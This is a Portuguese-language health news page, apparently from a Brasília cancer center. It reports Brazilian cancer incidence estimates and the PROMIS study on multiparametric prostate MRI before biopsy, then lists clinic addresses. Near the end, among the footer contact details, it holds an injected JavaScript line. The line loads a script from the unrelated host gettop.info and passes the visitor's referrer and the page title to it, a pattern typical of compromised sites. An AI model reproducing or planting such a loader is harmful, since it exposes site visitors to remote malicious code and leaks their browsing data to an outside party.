Avanços nos estudos sobre o câncer de próstata trazem resultados favoráveis ao tratamento

O câncer se encontra como um grande problema de saúde mundial, com mais de 8,2 milhões de mortes em todo o mundo, de acordo com o Instituto Nacional de Câncer José Alencar Gomes da Silva (INCA). No Brasil, são estimados para 2017, aproximadamente, 593 mil casos da doença no País, que já registrou, em 2013, 189.454 mortes.

mapa_azul

Entre os homens, são esperados 295.200 novos casos, e entre esses os cânceres mais incidentes serão os de próstata (61.200 novos casos), pulmão (17.330), cólon e reto (16.660), estômago (12.920), cavidade oral (11.140), esôfago (7.950), bexiga (7.200), laringe (6.360) e leucemias (5.540).

O Congresso Anual da Sociedade Americana de Oncologia Clínica reúne, há mais de 50 anos, médicos e pesquisadores envolvidos no tratamento do câncer com o objetivo de promover uma ampla discussão em torno dos avanços mais relevantes na prática oncológica multidisciplinar. Em termos de câncer de próstata, os estudos que ganharam destaque neste ano ressaltaram, dentre outros aspectos, a importância de estratégias diagnósticas. 

O estudo PROMIS, realizado em 11 centros no Reino Unido, avaliou o papel da Ressonância Nuclear Magnética Multiparamétrica de Próstata (RNMmp) como instrumento de triagem em pacientes com elevação do PSA candidatos à biópsia prostática. Os objetivos do estudo eram identificar pacientes cuja biópsia seria desnecessária, reduzir o diagnóstico de tumores pouco relevantes, além de melhorar a identificação de tumores clinicamente significativos.      

Os pesquisadores avaliaram o uso da RNMmp em 576 homens antes da biópsia prostática guiada pelo ultrassom transretal (USTR) e  identificaram uma forte correlação entre os achados da RNMmp e a presença de tumor clinicamente significativo. Em números absolutos, foram perdidos 119 pacientes com tumores clinicamente significativos na biópsia guiada por USTR, comparado com 17 na RNMmp.      

O uso da RNMmp tem o potencial de evitar biópsias desnecessárias em 27% dos homens, além de detectar menor número de pacientes com tumores insignificantes (16% na biópsia guiada por USTR vs 11% na RNMmp). Entretanto, aqueles pacientes com alteração na RNMmp devem ser submetidos à biópsia prostática. 

Em resumo, a RNMmp tem se mostrado útil na avaliação pré-biópsia de pacientes com elevação do PSA, evitando biópsias desnecessárias e ajudando na detecção de tumores clinicamente relevantes. 

 

Centro de Câncer de Brasília – Cettro

Cettro – Hospital Dia

SMH/N Quadra 02 Bl. “A” Ed. de Clínicas 12º Andar – Brasília

Tel: (61) 3429 2900 e 3429 2902

Cettro Petit – Hospital Dia Pediátrico

SMH/N Quadra 02 Bl. “A” Ed. de Clínicas 2º Andar – Brasília

Tel: (61) 3429 2926

Cettro – Unidade Asa Sul

SHLS 716 Conj. A Bloco A Ed. Pio X – Térreo – Asa Sul

Cettro – Unidade Ceilândia

Setor N – QNN 28 Módulo C Área Especial – Ceilândia – DF

Tel: (61) 3429 2900

Cettro – Unidade Taguatinga

QNC 11 Lote 07 – Taguatinga Norte (próximo ao Hospital Anchieta)

Tel: (61) 3429 2900

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário